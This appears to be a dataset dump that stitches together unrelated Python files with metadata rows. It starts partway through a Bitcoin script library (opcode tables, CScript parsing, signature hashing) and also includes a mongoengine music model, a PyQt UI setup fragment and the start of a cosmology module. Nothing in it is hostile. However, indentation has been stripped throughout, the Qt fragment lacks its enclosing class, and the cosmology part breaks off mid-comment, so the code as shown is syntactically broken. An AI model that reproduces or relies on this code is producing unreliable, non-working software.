OP_NOP3: 'OP_NOP3',
OP_NOP4: 'OP_NOP4',
OP_NOP5: 'OP_NOP5',
OP_NOP6: 'OP_NOP6',
OP_NOP7: 'OP_NOP7',
OP_NOP8: 'OP_NOP8',
OP_NOP9: 'OP_NOP9',
OP_NOP10: 'OP_NOP10',
OP_SMALLINTEGER: 'OP_SMALLINTEGER',
OP_PUBKEYS: 'OP_PUBKEYS',
OP_PUBKEYHASH: 'OP_PUBKEYHASH',
OP_PUBKEY: 'OP_PUBKEY',
OP_INVALIDOPCODE: 'OP_INVALIDOPCODE',
})
OPCODES_BY_NAME = {
'OP_0': OP_0,
'OP_PUSHDATA1': OP_PUSHDATA1,
'OP_PUSHDATA2': OP_PUSHDATA2,
'OP_PUSHDATA4': OP_PUSHDATA4,
'OP_1NEGATE': OP_1NEGATE,
'OP_RESERVED': OP_RESERVED,
'OP_1': OP_1,
'OP_2': OP_2,
'OP_3': OP_3,
'OP_4': OP_4,
'OP_5': OP_5,
'OP_6': OP_6,
'OP_7': OP_7,
'OP_8': OP_8,
'OP_9': OP_9,
'OP_10': OP_10,
'OP_11': OP_11,
'OP_12': OP_12,
'OP_13': OP_13,
'OP_14': OP_14,
'OP_15': OP_15,
'OP_16': OP_16,
'OP_NOP': OP_NOP,
'OP_VER': OP_VER,
'OP_IF': OP_IF,
'OP_NOTIF': OP_NOTIF,
'OP_VERIF': OP_VERIF,
'OP_VERNOTIF': OP_VERNOTIF,
'OP_ELSE': OP_ELSE,
'OP_ENDIF': OP_ENDIF,
'OP_VERIFY': OP_VERIFY,
'OP_RETURN': OP_RETURN,
'OP_TOALTSTACK': OP_TOALTSTACK,
'OP_FROMALTSTACK': OP_FROMALTSTACK,
'OP_2DROP': OP_2DROP,
'OP_2DUP': OP_2DUP,
'OP_3DUP': OP_3DUP,
'OP_2OVER': OP_2OVER,
'OP_2ROT': OP_2ROT,
'OP_2SWAP': OP_2SWAP,
'OP_IFDUP': OP_IFDUP,
'OP_DEPTH': OP_DEPTH,
'OP_DROP': OP_DROP,
'OP_DUP': OP_DUP,
'OP_NIP': OP_NIP,
'OP_OVER': OP_OVER,
'OP_PICK': OP_PICK,
'OP_ROLL': OP_ROLL,
'OP_ROT': OP_ROT,
'OP_SWAP': OP_SWAP,
'OP_TUCK': OP_TUCK,
'OP_CAT': OP_CAT,
'OP_SUBSTR': OP_SUBSTR,
'OP_LEFT': OP_LEFT,
'OP_RIGHT': OP_RIGHT,
'OP_SIZE': OP_SIZE,
'OP_INVERT': OP_INVERT,
'OP_AND': OP_AND,
'OP_OR': OP_OR,
'OP_XOR': OP_XOR,
'OP_EQUAL': OP_EQUAL,
'OP_EQUALVERIFY': OP_EQUALVERIFY,
'OP_RESERVED1': OP_RESERVED1,
'OP_RESERVED2': OP_RESERVED2,
'OP_1ADD': OP_1ADD,
'OP_1SUB': OP_1SUB,
'OP_2MUL': OP_2MUL,
'OP_2DIV': OP_2DIV,
'OP_NEGATE': OP_NEGATE,
'OP_ABS': OP_ABS,
'OP_NOT': OP_NOT,
'OP_0NOTEQUAL': OP_0NOTEQUAL,
'OP_ADD': OP_ADD,
'OP_SUB': OP_SUB,
'OP_MUL': OP_MUL,
'OP_DIV': OP_DIV,
'OP_MOD': OP_MOD,
'OP_LSHIFT': OP_LSHIFT,
'OP_RSHIFT': OP_RSHIFT,
'OP_BOOLAND': OP_BOOLAND,
'OP_BOOLOR': OP_BOOLOR,
'OP_NUMEQUAL': OP_NUMEQUAL,
'OP_NUMEQUALVERIFY': OP_NUMEQUALVERIFY,
'OP_NUMNOTEQUAL': OP_NUMNOTEQUAL,
'OP_LESSTHAN': OP_LESSTHAN,
'OP_GREATERTHAN': OP_GREATERTHAN,
'OP_LESSTHANOREQUAL': OP_LESSTHANOREQUAL,
'OP_GREATERTHANOREQUAL': OP_GREATERTHANOREQUAL,
'OP_MIN': OP_MIN,
'OP_MAX': OP_MAX,
'OP_WITHIN': OP_WITHIN,
'OP_RIPEMD160': OP_RIPEMD160,
'OP_SHA1': OP_SHA1,
'OP_SHA256': OP_SHA256,
'OP_HASH160': OP_HASH160,
'OP_HASH256': OP_HASH256,
'OP_CODESEPARATOR': OP_CODESEPARATOR,
'OP_CHECKSIG': OP_CHECKSIG,
'OP_CHECKSIGVERIFY': OP_CHECKSIGVERIFY,
'OP_CHECKMULTISIG': OP_CHECKMULTISIG,
'OP_CHECKMULTISIGVERIFY': OP_CHECKMULTISIGVERIFY,
'OP_NOP1': OP_NOP1,
'OP_NOP2': OP_NOP2,
'OP_CHECKLOCKTIMEVERIFY': OP_CHECKLOCKTIMEVERIFY,
'OP_NOP3': OP_NOP3,
'OP_NOP4': OP_NOP4,
'OP_NOP5': OP_NOP5,
'OP_NOP6': OP_NOP6,
'OP_NOP7': OP_NOP7,
'OP_NOP8': OP_NOP8,
'OP_NOP9': OP_NOP9,
'OP_NOP10': OP_NOP10,
'OP_SMALLINTEGER': OP_SMALLINTEGER,
'OP_PUBKEYS': OP_PUBKEYS,
'OP_PUBKEYHASH': OP_PUBKEYHASH,
'OP_PUBKEY': OP_PUBKEY,
}
# Invalid even when occuring in an unexecuted OP_IF branch due to either being
# disabled, or never having been implemented.
DISABLED_OPCODES = frozenset((OP_VERIF, OP_VERNOTIF,
OP_CAT, OP_SUBSTR, OP_LEFT, OP_RIGHT, OP_INVERT, OP_AND,
OP_OR, OP_XOR, OP_2MUL, OP_2DIV, OP_MUL, OP_DIV, OP_MOD,
OP_LSHIFT, OP_RSHIFT))
class CScriptInvalidError(Exception):
"""Base class for CScript exceptions"""
pass
class CScriptTruncatedPushDataError(CScriptInvalidError):
"""Invalid pushdata due to truncation"""
def __init__(self, msg, data):
self.data = data
super(CScriptTruncatedPushDataError, self).__init__(msg)
class CScript(bytes):
"""Serialized script
A bytes subclass, so you can use this directly whenever bytes are accepted.
Note that this means that indexing does *not* work - you'll get an index by
byte rather than opcode. This format was chosen for efficiency so that the
general case would not require creating a lot of little CScriptOP objects.
iter(script) however does iterate by opcode.
"""
@classmethod
def __coerce_instance(cls, other):
# Coerce other into bytes
if isinstance(other, CScriptOp):
other = _bchr(other)
elif isinstance(other, (int, long)):
if 0 <= other <= 16:
other = bytes(_bchr(CScriptOp.encode_op_n(other)))
elif other == -1:
other = bytes(_bchr(OP_1NEGATE))
else:
other = CScriptOp.encode_op_pushdata(bitcoin.core._bignum.bn2vch(other))
elif isinstance(other, (bytes, bytearray)):
other = CScriptOp.encode_op_pushdata(other)
return other
def __add__(self, other):
# Do the coercion outside of the try block so that errors in it are
# noticed.
other = self.__coerce_instance(other)
try:
# bytes.__add__ always returns bytes instances unfortunately
return CScript(super(CScript, self).__add__(other))
except TypeError:
raise TypeError('Can not add a %r instance to a CScript' % other.__class__)
def join(self, iterable):
# join makes no sense for a CScript()
raise NotImplementedError
def __new__(cls, value=b''):
if isinstance(value, bytes) or isinstance(value, bytearray):
return super(CScript, cls).__new__(cls, value)
else:
def coerce_iterable(iterable):
for instance in iterable:
yield cls.__coerce_instance(instance)
# Annoyingly on both python2 and python3 bytes.join() always
# returns a bytes instance even when subclassed.
return super(CScript, cls).__new__(cls, b''.join(coerce_iterable(value)))
def raw_iter(self):
"""Raw iteration
Yields tuples of (opcode, data, sop_idx) so that the different possible
PUSHDATA encodings can be accurately distinguished, as well as
determining the exact opcode byte indexes. (sop_idx)
"""
i = 0
while i < len(self):
sop_idx = i
opcode = _bord(self[i])
i += 1
if opcode > OP_PUSHDATA4:
yield (opcode, None, sop_idx)
else:
datasize = None
pushdata_type = None
if opcode < OP_PUSHDATA1:
pushdata_type = 'PUSHDATA(%d)' % opcode
datasize = opcode
elif opcode == OP_PUSHDATA1:
pushdata_type = 'PUSHDATA1'
if i >= len(self):
raise CScriptInvalidError('PUSHDATA1: missing data length')
datasize = _bord(self[i])
i += 1
elif opcode == OP_PUSHDATA2:
pushdata_type = 'PUSHDATA2'
if i + 1 >= len(self):
raise CScriptInvalidError('PUSHDATA2: missing data length')
datasize = _bord(self[i]) + (_bord(self[i+1]) << 8)
i += 2
elif opcode == OP_PUSHDATA4:
pushdata_type = 'PUSHDATA4'
if i + 3 >= len(self):
raise CScriptInvalidError('PUSHDATA4: missing data length')
datasize = _bord(self[i]) + (_bord(self[i+1]) << 8) + (_bord(self[i+2]) << 16) + (_bord(self[i+3]) << 24)
i += 4
else:
assert False # shouldn't happen
data = bytes(self[i:i+datasize])
# Check for truncation
if len(data) < datasize:
raise CScriptTruncatedPushDataError('%s: truncated data' % pushdata_type, data)
i += datasize
yield (opcode, data, sop_idx)
def __iter__(self):
"""'Cooked' iteration
Returns either a CScriptOP instance, an integer, or bytes, as
appropriate.
See raw_iter() if you need to distinguish the different possible
PUSHDATA encodings.
"""
for (opcode, data, sop_idx) in self.raw_iter():
if opcode == 0:
yield 0
elif data is not None:
yield data
else:
opcode = CScriptOp(opcode)
if opcode.is_small_int():
yield opcode.decode_op_n()
else:
yield CScriptOp(opcode)
def __repr__(self):
# For Python3 compatibility add b before strings so testcases don't
# need to change
def _repr(o):
if isinstance(o, bytes):
return "x('%s')" % bitcoin.core.b2x(o)
else:
return repr(o)
ops = []
i = iter(self)
while True:
op = None
try:
op = _repr(next(i))
except CScriptTruncatedPushDataError as err:
op = '%s...<ERROR: %s>' % (_repr(err.data), err)
break
except CScriptInvalidError as err:
op = '<ERROR: %s>' % err
break
except StopIteration:
break
finally:
if op is not None:
ops.append(op)
return "CScript([%s])" % ', '.join(ops)
def is_p2sh(self):
"""Test if the script is a p2sh scriptPubKey
Note that this test is consensus-critical.
"""
return (len(self) == 23 and
_bord(self[0]) == OP_HASH160 and
_bord(self[1]) == 0x14 and
_bord(self[22]) == OP_EQUAL)
def is_witness_scriptpubkey(self):
"""Returns true if this is a scriptpubkey signaling segregated witness
data. """
return 3 <= len(self) <= 42 and CScriptOp(struct.unpack('<b',self[0])[0]).is_small_int()
def witness_version(self):
"""Returns the witness version on [0,16]. """
return next(iter(self))
def is_witness_v0_keyhash(self):
"""Returns true if this is a scriptpubkey for V0 P2WPKH. """
return len(self) == 22 and self[0:2] == b'\x00\x14'
def is_witness_v0_nested_keyhash(self):
"""Returns true if this is a scriptpubkey for V0 P2WPKH embedded in P2SH. """
return len(self) == 23 and self[0:3] == b'\x16\x00\x14'
def is_witness_v0_scripthash(self):
"""Returns true if this is a scriptpubkey for V0 P2WSH. """
return len(self) == 34 and self[0:2] == b'\x00\x20'
def is_witness_v0_nested_scripthash(self):
"""Returns true if this is a scriptpubkey for V0 P2WSH embedded in P2SH. """
return len(self) == 23 and self[0:2] == b'\xa9\x14' and self[-1] == b'\x87'
def is_push_only(self):
"""Test if the script only contains pushdata ops
Note that this test is consensus-critical.
Scripts that contain invalid pushdata ops return False, matching the
behavior in Bitcoin Core.
"""
try:
for (op, op_data, idx) in self.raw_iter():
# Note how OP_RESERVED is considered a pushdata op.
if op > OP_16:
return False
except CScriptInvalidError:
return False
return True
def has_canonical_pushes(self):
"""Test if script only uses canonical pushes
Not yet consensus critical; may be in the future.
"""
try:
for (op, data, idx) in self.raw_iter():
if op > OP_16:
continue
elif op < OP_PUSHDATA1 and op > OP_0 and len(data) == 1 and _bord(data[0]) <= 16:
# Could have used an OP_n code, rather than a 1-byte push.
return False
elif op == OP_PUSHDATA1 and len(data) < OP_PUSHDATA1:
# Could have used a normal n-byte push, rather than OP_PUSHDATA1.
return False
elif op == OP_PUSHDATA2 and len(data) <= 0xFF:
# Could have used a OP_PUSHDATA1.
return False
elif op == OP_PUSHDATA4 and len(data) <= 0xFFFF:
# Could have used a OP_PUSHDATA2.
return False
except CScriptInvalidError: # Invalid pushdata
return False
return True
def is_unspendable(self):
"""Test if the script is provably unspendable"""
return (len(self) > 0 and
_bord(self[0]) == OP_RETURN)
def is_valid(self):
"""Return True if the script is valid, False otherwise
The script is valid if all PUSHDATA's are valid; invalid opcodes do not
make is_valid() return False.
"""
try:
list(self)
except CScriptInvalidError:
return False
return True
def to_p2sh_scriptPubKey(self, checksize=True):
"""Create P2SH scriptPubKey from this redeemScript
That is, create the P2SH scriptPubKey that requires this script as a
redeemScript to spend.
checksize - Check if the redeemScript is larger than the 520-byte max
pushdata limit; raise ValueError if limit exceeded.
Since a >520-byte PUSHDATA makes EvalScript() fail, it's not actually
possible to redeem P2SH outputs with redeem scripts >520 bytes.
"""
if checksize and len(self) > MAX_SCRIPT_ELEMENT_SIZE:
raise ValueError("redeemScript exceeds max allowed size; P2SH output would be unspendable")
return CScript([OP_HASH160, bitcoin.core.Hash160(self), OP_EQUAL])
def GetSigOpCount(self, fAccurate):
"""Get the SigOp count.
fAccurate - Accurately count CHECKMULTISIG, see BIP16 for details.
Note that this is consensus-critical.
"""
n = 0
lastOpcode = OP_INVALIDOPCODE
for (opcode, data, sop_idx) in self.raw_iter():
if opcode in (OP_CHECKSIG, OP_CHECKSIGVERIFY):
n += 1
elif opcode in (OP_CHECKMULTISIG, OP_CHECKMULTISIGVERIFY):
if fAccurate and (OP_1 <= lastOpcode <= OP_16):
n += opcode.decode_op_n()
else:
n += 20
lastOpcode = opcode
return n
class CScriptWitness(ImmutableSerializable):
"""An encoding of the data elements on the initial stack for (segregated
witness)
"""
__slots__ = ['stack']
def __init__(self, stack=()):
object.__setattr__(self, 'stack', stack)
def __len__(self):
return len(self.stack)
def __iter__(self):
return iter(self.stack)
def __repr__(self):
return 'CScriptWitness(' + ','.join("x('%s')" % bitcoin.core.b2x(s) for s in self.stack) + ')'
def is_null(self):
return len(self.stack) == 0
@classmethod
def stream_deserialize(cls, f):
n = VarIntSerializer.stream_deserialize(f)
stack = tuple(BytesSerializer.stream_deserialize(f) for i in range(n))
return cls(stack)
def stream_serialize(self, f):
VarIntSerializer.stream_serialize(len(self.stack), f)
for s in self.stack:
BytesSerializer.stream_serialize(s, f)
SIGHASH_ALL = 1
SIGHASH_NONE = 2
SIGHASH_SINGLE = 3
SIGHASH_ANYONECANPAY = 0x80
def FindAndDelete(script, sig):
"""Consensus critical, see FindAndDelete() in Satoshi codebase"""
r = b''
last_sop_idx = sop_idx = 0
skip = True
for (opcode, data, sop_idx) in script.raw_iter():
if not skip:
r += script[last_sop_idx:sop_idx]
last_sop_idx = sop_idx
if script[sop_idx:sop_idx + len(sig)] == sig:
skip = True
else:
skip = False
if not skip:
r += script[last_sop_idx:]
return CScript(r)
def IsLowDERSignature(sig):
"""
Loosely correlates with IsLowDERSignature() from script/interpreter.cpp
Verifies that the S value in a DER signature is the lowest possible value.
Used by BIP62 malleability fixes.
"""
length_r = sig[3]
if isinstance(length_r, str):
length_r = int(struct.unpack('B', length_r)[0])
length_s = sig[5 + length_r]
if isinstance(length_s, str):
length_s = int(struct.unpack('B', length_s)[0])
s_val = list(struct.unpack(str(length_s) + 'B', sig[6 + length_r:6 + length_r + length_s]))
# If the S value is above the order of the curve divided by two, its
# complement modulo the order could have been used instead, which is
# one byte shorter when encoded correctly.
max_mod_half_order = [
0x7f,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0x5d,0x57,0x6e,0x73,0x57,0xa4,0x50,0x1d,
0xdf,0xe9,0x2f,0x46,0x68,0x1b,0x20,0xa0]
return CompareBigEndian(s_val, [0]) > 0 and \
CompareBigEndian(s_val, max_mod_half_order) <= 0
def CompareBigEndian(c1, c2):
"""
Loosely matches CompareBigEndian() from eccryptoverify.cpp
Compares two arrays of bytes, and returns a negative value if the first is
less than the second, 0 if they're equal, and a positive value if the
first is greater than the second.
"""
c1 = list(c1)
c2 = list(c2)
# Adjust starting positions until remaining lengths of the two arrays match
while len(c1) > len(c2):
if c1.pop(0) > 0:
return 1
while len(c2) > len(c1):
if c2.pop(0) > 0:
return -1
while len(c1) > 0:
diff = c1.pop(0) - c2.pop(0)
if diff != 0:
return diff
return 0
def RawSignatureHash(script, txTo, inIdx, hashtype):
"""Consensus-correct SignatureHash
Returns (hash, err) to precisely match the consensus-critical behavior of
the SIGHASH_SINGLE bug. (inIdx is *not* checked for validity)
If you're just writing wallet software you probably want SignatureHash()
instead.
"""
HASH_ONE = b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
if inIdx >= len(txTo.vin):
return (HASH_ONE, "inIdx %d out of range (%d)" % (inIdx, len(txTo.vin)))
txtmp = bitcoin.core.CMutableTransaction.from_tx(txTo)
for txin in txtmp.vin:
txin.scriptSig = b''
txtmp.vin[inIdx].scriptSig = FindAndDelete(script, CScript([OP_CODESEPARATOR]))
if (hashtype & 0x1f) == SIGHASH_NONE:
txtmp.vout = []
for i in range(len(txtmp.vin)):
if i != inIdx:
txtmp.vin[i].nSequence = 0
elif (hashtype & 0x1f) == SIGHASH_SINGLE:
outIdx = inIdx
if outIdx >= len(txtmp.vout):
return (HASH_ONE, "outIdx %d out of range (%d)" % (outIdx, len(txtmp.vout)))
tmp = txtmp.vout[outIdx]
txtmp.vout = []
for i in range(outIdx):
txtmp.vout.append(bitcoin.core.CTxOut())
txtmp.vout.append(tmp)
for i in range(len(txtmp.vin)):
if i != inIdx:
txtmp.vin[i].nSequence = 0
if hashtype & SIGHASH_ANYONECANPAY:
tmp = txtmp.vin[inIdx]
txtmp.vin = []
txtmp.vin.append(tmp)
txtmp.wit = bitcoin.core.CTxWitness()
s = txtmp.serialize()
s += struct.pack(b"<i", hashtype)
hash = bitcoin.core.Hash(s)
return (hash, None)
SIGVERSION_BASE = 0
SIGVERSION_WITNESS_V0 = 1
def SignatureHash(script, txTo, inIdx, hashtype, amount=None, sigversion=SIGVERSION_BASE):
"""Calculate a signature hash
'Cooked' version that checks if inIdx is out of bounds - this is *not*
consensus-correct behavior, but is what you probably want for general
wallet use.
"""
if sigversion == SIGVERSION_WITNESS_V0:
hashPrevouts = b'\x00'*32
hashSequence = b'\x00'*32
hashOutputs = b'\x00'*32
if not (hashtype & SIGHASH_ANYONECANPAY):
serialize_prevouts = bytes()
for i in txTo.vin:
serialize_prevouts += i.prevout.serialize()
hashPrevouts = bitcoin.core.Hash(serialize_prevouts)
if (not (hashtype & SIGHASH_ANYONECANPAY) and (hashtype & 0x1f) != SIGHASH_SINGLE and (hashtype & 0x1f) != SIGHASH_NONE):
serialize_sequence = bytes()
for i in txTo.vin:
serialize_sequence += struct.pack("<I", i.nSequence)
hashSequence = bitcoin.core.Hash(serialize_sequence)
if ((hashtype & 0x1f) != SIGHASH_SINGLE and (hashtype & 0x1f) != SIGHASH_NONE):
serialize_outputs = bytes()
for o in txTo.vout:
serialize_outputs += o.serialize()
hashOutputs = bitcoin.core.Hash(serialize_outputs)
elif ((hashtype & 0x1f) == SIGHASH_SINGLE and inIdx < len(txTo.vout)):
serialize_outputs = txTo.vout[inIdx].serialize()
hashOutputs = bitcoin.core.Hash(serialize_outputs)
f = _BytesIO()
f.write(struct.pack("<i", txTo.nVersion))
f.write(hashPrevouts)
f.write(hashSequence)
txTo.vin[inIdx].prevout.stream_serialize(f)
BytesSerializer.stream_serialize(script, f)
f.write(struct.pack("<q", amount))
f.write(struct.pack("<I", txTo.vin[inIdx].nSequence))
f.write(hashOutputs)
f.write(struct.pack("<i", txTo.nLockTime))
f.write(struct.pack("<i", hashtype))
return bitcoin.core.Hash(f.getvalue())
assert not script.is_witness_scriptpubkey()
(h, err) = RawSignatureHash(script, txTo, inIdx, hashtype)
if err is not None:
raise ValueError(err)
return h
__all__ = (
'MAX_SCRIPT_SIZE',
'MAX_SCRIPT_ELEMENT_SIZE',
'MAX_SCRIPT_OPCODES',
'OPCODE_NAMES',
'CScriptOp',
# every opcode
'OP_0',
'OP_FALSE',
'OP_PUSHDATA1',
'OP_PUSHDATA2',
'OP_PUSHDATA4',
'OP_1NEGATE',
'OP_RESERVED',
'OP_1',
'OP_TRUE',
'OP_2',
'OP_3',
'OP_4',
'OP_5',
'OP_6',
'OP_7',
'OP_8',
'OP_9',
'OP_10',
'OP_11',
'OP_12',
'OP_13',
'OP_14',
'OP_15',
'OP_16',
'OP_NOP',
'OP_VER',
'OP_IF',
'OP_NOTIF',
'OP_VERIF',
'OP_VERNOTIF',
'OP_ELSE',
'OP_ENDIF',
'OP_VERIFY',
'OP_RETURN',
'OP_TOALTSTACK',
'OP_FROMALTSTACK',
'OP_2DROP',
'OP_2DUP',
'OP_3DUP',
'OP_2OVER',
'OP_2ROT',
'OP_2SWAP',
'OP_IFDUP',
'OP_DEPTH',
'OP_DROP',
'OP_DUP',
'OP_NIP',
'OP_OVER',
'OP_PICK',
'OP_ROLL',
'OP_ROT',
'OP_SWAP',
'OP_TUCK',
'OP_CAT',
'OP_SUBSTR',
'OP_LEFT',
'OP_RIGHT',
'OP_SIZE',
'OP_INVERT',
'OP_AND',
'OP_OR',
'OP_XOR',
'OP_EQUAL',
'OP_EQUALVERIFY',
'OP_RESERVED1',
'OP_RESERVED2',
'OP_1ADD',
'OP_1SUB',
'OP_2MUL',
'OP_2DIV',
'OP_NEGATE',
'OP_ABS',
'OP_NOT',
'OP_0NOTEQUAL',
'OP_ADD',
'OP_SUB',
'OP_MUL',
'OP_DIV',
'OP_MOD',
'OP_LSHIFT',
'OP_RSHIFT',
'OP_BOOLAND',
'OP_BOOLOR',
'OP_NUMEQUAL',
'OP_NUMEQUALVERIFY',
'OP_NUMNOTEQUAL',
'OP_LESSTHAN',
'OP_GREATERTHAN',
'OP_LESSTHANOREQUAL',
'OP_GREATERTHANOREQUAL',
'OP_MIN',
'OP_MAX',
'OP_WITHIN',
'OP_RIPEMD160',
'OP_SHA1',
'OP_SHA256',
'OP_HASH160',
'OP_HASH256',
'OP_CODESEPARATOR',
'OP_CHECKSIG',
'OP_CHECKSIGVERIFY',
'OP_CHECKMULTISIG',
'OP_CHECKMULTISIGVERIFY',
'OP_NOP1',
'OP_NOP2',
'OP_CHECKLOCKTIMEVERIFY',
'OP_NOP3',
'OP_NOP4',
'OP_NOP5',
'OP_NOP6',
'OP_NOP7',
'OP_NOP8',
'OP_NOP9',
'OP_NOP10',
'OP_SMALLINTEGER',
'OP_PUBKEYS',
'OP_PUBKEYHASH',
'OP_PUBKEY',
'OP_INVALIDOPCODE',
'OPCODES_BY_NAME',
'DISABLED_OPCODES',
'CScriptInvalidError',
'CScriptTruncatedPushDataError',
'CScript',
'CScriptWitness',
'SIGHASH_ALL',
'SIGHASH_NONE',
'SIGHASH_SINGLE',
'SIGHASH_ANYONECANPAY',
'FindAndDelete',
'RawSignatureHash',
'SignatureHash',
'IsLowDERSignature',
'SIGVERSION_BASE',
'SIGVERSION_WITNESS_V0',
)
| gpl-3.0 | -7,740,762,687,538,103,000 | 28.58497 | 146 | 0.570777 | false |
DouFM/wang_fm | storage/music.py | 1 | 1709 | #!/usr/bin/env python
# encoding: utf-8
import mongoengine
from .base import BaseMongoStorage
from config import DB_HOST, DB_PORT, DB_NAME
mongoengine.connect(DB_NAME, host=DB_HOST, port=DB_PORT)
class MusicStorage(BaseMongoStorage, mongoengine.Document):
"""store music info
key str
title str
artist str
album str
company str
public_time str
kbps str
cover file
audio file
upload_date datetime
uuid str
"""
title = mongoengine.StringField(max_length=256, default='')
artist = mongoengine.StringField(max_length=256, default='')
album = mongoengine.StringField(max_length=256, default='')
company = mongoengine.StringField(max_length=256, default='')
public_time = mongoengine.StringField(max_length=10, default='')
kbps = mongoengine.StringField(max_length=5, default='')
cover = mongoengine.FileField()
audio = mongoengine.FileField()
upload_date = mongoengine.DateTimeField()
uuid = mongoengine.StringField(unique=True)
meta = {
'ordering': ['-upload_date']
}
def __str__(self):
return 'title=%s, artist=%s, album=%s' % (self.title, self.artist, self.album)
def delete(self):
self.cover.delete()
self.audio.delete()
super(MusicStorage, self).delete()
def update(self, **kwargs):
cover = kwargs.pop('cover', None)
audio = kwargs.pop('audio', None)
if cover:
self.cover.replace(cover)
if audio:
self.audio.replace(audio)
self.save()
super(MusicStorage, self).update(**kwargs)
| mit | -6,727,684,040,444,985,000 | 28.982456 | 86 | 0.607958 | false |
hikaruAi/timeShoot | mainwindow.py | 1 | 4123 | MainForm.setObjectName(_fromUtf8("MainForm"))
MainForm.resize(281, 120)
MainWindow.browseButton = QtGui.QPushButton(MainForm)
MainWindow.browseButton.setGeometry(QtCore.QRect(150, 30, 51, 21))
MainWindow.browseButton.setFlat(False)
MainWindow.browseButton.setObjectName(_fromUtf8("browseButton"))
MainWindow.ouputText = QtGui.QLineEdit(MainForm)
MainWindow.ouputText.setGeometry(QtCore.QRect(10, 30, 141, 20))
MainWindow.ouputText.setObjectName(_fromUtf8("ouputText"))
MainWindow.label = QtGui.QLabel(MainForm)
MainWindow.label.setGeometry(QtCore.QRect(10, 10, 71, 16))
MainWindow.label.setObjectName(_fromUtf8("label"))
MainWindow.label_2 = QtGui.QLabel(MainForm)
MainWindow.label_2.setGeometry(QtCore.QRect(10, 60, 91, 16))
MainWindow.label_2.setObjectName(_fromUtf8("label_2"))
MainWindow.formatBox = QtGui.QComboBox(MainForm)
MainWindow.formatBox.setGeometry(QtCore.QRect(120, 80, 69, 22))
MainWindow.formatBox.setObjectName(_fromUtf8("formatBox"))
MainWindow.formatBox.addItem(_fromUtf8(""))
MainWindow.formatBox.addItem(_fromUtf8(""))
MainWindow.formatBox.addItem(_fromUtf8(""))
MainWindow.formatBox.addItem(_fromUtf8(""))
MainWindow.formatBox.addItem(_fromUtf8(""))
MainWindow.label_3 = QtGui.QLabel(MainForm)
MainWindow.label_3.setGeometry(QtCore.QRect(120, 60, 61, 16))
MainWindow.label_3.setObjectName(_fromUtf8("label_3"))
MainWindow.delayBox = QtGui.QDoubleSpinBox(MainForm)
MainWindow.delayBox.setGeometry(QtCore.QRect(10, 80, 81, 22))
MainWindow.delayBox.setDecimals(3)
MainWindow.delayBox.setMinimum(0.001)
MainWindow.delayBox.setMaximum(999999.999)
MainWindow.delayBox.setSingleStep(5.0)
MainWindow.delayBox.setProperty("value", 5.0)
MainWindow.delayBox.setObjectName(_fromUtf8("delayBox"))
MainWindow.mainButton = QtGui.QPushButton(MainForm)
MainWindow.mainButton.setGeometry(QtCore.QRect(210, 10, 61, 41))
MainWindow.mainButton.setObjectName(_fromUtf8("mainButton"))
MainWindow.stopButton = QtGui.QPushButton(MainForm)
MainWindow.stopButton.setGeometry(QtCore.QRect(210, 60, 61, 41))
MainWindow.stopButton.setObjectName(_fromUtf8("stopButton"))
QtCore.QMetaObject.connectSlotsByName(MainForm)
MainForm.setTabOrder(MainWindow.browseButton, MainWindow.delayBox)
MainForm.setTabOrder(MainWindow.delayBox, MainWindow.formatBox)
MainForm.setTabOrder(MainWindow.formatBox, MainWindow.mainButton)
MainForm.setTabOrder(MainWindow.mainButton, MainWindow.stopButton)
MainForm.setTabOrder(MainWindow.stopButton, MainWindow.ouputText)
MainForm.setWindowTitle(QtGui.QApplication.translate("MainForm", "Title", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.browseButton.setText(QtGui.QApplication.translate("MainForm", "Browse", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.label.setText(QtGui.QApplication.translate("MainForm", "Output :", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.label_2.setText(QtGui.QApplication.translate("MainForm", "Delay (seconds) :", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.formatBox.setItemText(0, QtGui.QApplication.translate("MainForm", "png", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.formatBox.setItemText(1, QtGui.QApplication.translate("MainForm", "jpg", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.formatBox.setItemText(2, QtGui.QApplication.translate("MainForm", "mp4", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.formatBox.setItemText(3, QtGui.QApplication.translate("MainForm", "avi", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.formatBox.setItemText(4, QtGui.QApplication.translate("MainForm", "mov", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.label_3.setText(QtGui.QApplication.translate("MainForm", "Format:", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.mainButton.setText(QtGui.QApplication.translate("MainForm", "Start", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.stopButton.setText(QtGui.QApplication.translate("MainForm", "Stop", None, QtGui.QApplication.UnicodeUTF8))
| gpl-3.0 | 7,120,725,703,614,476,000 | 70.086207 | 131 | 0.770313 | false |
bamford/astrobamf | cosmology.py | 1 | 17513 | # cosmology.py
# (formerly distance_modulus.py)
from math import log, sqrt, pi, sin, cos, exp
from nr import erffc
#from ppgplot_spb import *
from checkarray import checkarray
import scipy.integrate
import numpy as N
# WMAP 1-year results
h0_WMAP1 = 0.71
H0_WMAP1 = h0_WMAP1 * 100.0
omega_m0_WMAP1 = 0.135 / h0_WMAP1**2
# WMAP 3-year results
h0_WMAP3 = 0.73
H0_WMAP3 = h0_WMAP3 * 100.0
omega_m0_WMAP3 = 0.127 / h0_WMAP3**2
H0_std = 70.0
omega_m0_std = 0.30
omega_lambda0_std = 1.0 - omega_m0_std
H0_classical = 75.0
q0_classical = 0.05
c0 = 299792.458 # km/s
# mass of Sun in kg
M_sun_kg = 1.9889e30 # kg
# Mpc in kilometres
Mpc_km = 3.0857e19 # km
# Newton's gravitational constant
G_N = 6.673e-11 # m**3 kg**(-1) s**(-2)
# Number of square degrees over full sky
sky_sq_deg = 4*pi * (180/pi)**2
# The distance modulus for a flat universe with
# omega_matter + omega_lambda = 1
def dmod_flat(z, H0=H0_std, omega_m0=omega_m0_std):
dL = dL_flat(z, H0, omega_m0)
mu = 5.0 * N.log10(dL*1.E6) - 5.0
return mu
# Luminosity distance for a flat universe with
# omega_matter + omega_lambda = 1
# in Mpc
